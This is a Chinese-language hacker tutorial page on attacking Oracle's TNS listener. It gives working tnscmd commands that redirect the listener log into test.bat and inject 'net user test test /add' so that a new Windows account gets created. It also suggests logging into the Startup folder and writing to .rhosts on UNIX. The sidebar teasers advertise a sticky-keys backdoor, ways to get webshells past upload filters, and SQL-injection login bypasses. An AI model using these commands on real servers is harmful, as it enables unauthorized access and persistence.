建站极客
网络安全 黑客教程 正文
针对Oracle的TNS listener的攻击方法
所属分类:
网络安全 / 黑客教程
阅读数:
160
收藏 0
赞 0
分享
首先,根据版本的不同,TNS listener可能较易受到多种类型的缓冲区溢出攻击,这些攻击可以在不提供用户ID和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出攻击。当listener为日志构建错误消息之后,service_name的值会被复制到某于栈结构的缓冲区内,从而引起溢出—覆盖保存值将返回栈中的地址。这种做法可以使攻击者获得控制权。事实上,TNS listener曾经有过多次溢出和格式化字符串的漏洞。
其次,另一类攻击和日志文件有关。只有当未给listener设置口令的时候,攻击才会有效。假设某个listener没有设置口令,攻击方法如下:
tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))” 将日志目录设置到C盘
tnscmd -h www.example.com -p 1521 –rawcmd “(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))” 将日志文件设置为test.bat
tnscmd -h www.example.com –rawcmd “(CONNECT_DATA=(( ||dir >test.txt||net user test test /add))” 该命令把dir >test.txt、net user test test /add命令写入c:\test.bat文件,由于双竖线的作用(第一条命令执行失败后,WINDOWS命令解释器执行后面的命令)把错误的信息注释掉, 从而可以执行我们提交的命令。
通过设置日志文件到不同的目录,例如WINDOWS的启动目录,当服务器重启将执行恶意用户提交的特定代码,从而对系统造成威胁。
运行于UNIX系统上的oracle也会受到同样的威胁。其中一种方法就是将“ ”回送给.rhost文件,当系统运行时,使用r*services命令。
pstools使用方法 软件名称:Pstools
运行平台:Windows
软件授权:免费软件
软件大小:550KB
下面我用一个实例来讲解这个命令的使用。假设我要对192.168.0.8计算机进行远程管理,那么我可以先打开一个命令行窗口。在命令行中输入以下命令后敲回车:
D:t
评论 0
收藏 0
赞 0
分享
命令行下一种新的加帐号的方法 今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个Shell.Users就足够了
评论 0
收藏 0
赞 0
分享
如何使用sqlcmd.exe 连接到数据库引擎 SQL Server 支持使用 TCP/IP 网络协议(默认值)、命名管道协议和 VIA 协议的客户端通信。如果客户端要连接到同一计算机上的数据库引擎实例,则也可以使用共享内存协议。通常有三种选择协议的方法。sqlcmd 实用工具
评论 0
收藏 0
赞 0
分享
按5次shift 键后门 利用方法 原理:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe ,你把explorer.exe换成sethc.exe 就是自动执行explorer.exe
评论 0
收藏 0
赞 0
分享
突破一流拦截 上传限制的方法 在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截
评论 0
收藏 0
赞 0
分享
命令行下一种新的添加帐号的方法 天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户
评论 0
收藏 0
赞 0
分享
PHP 万能密码 说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百
评论 0
收藏 0
赞 0
分享
批处理也疯狂 @echo off
set c=00123456789ABCDEF0
:loop
set /a num=%random%%%16
call set col=%%c:~%num%,2%%
COLOR %col%
ping -n3 127.1>
评论 0
收藏 0
赞 0
分享
查看更多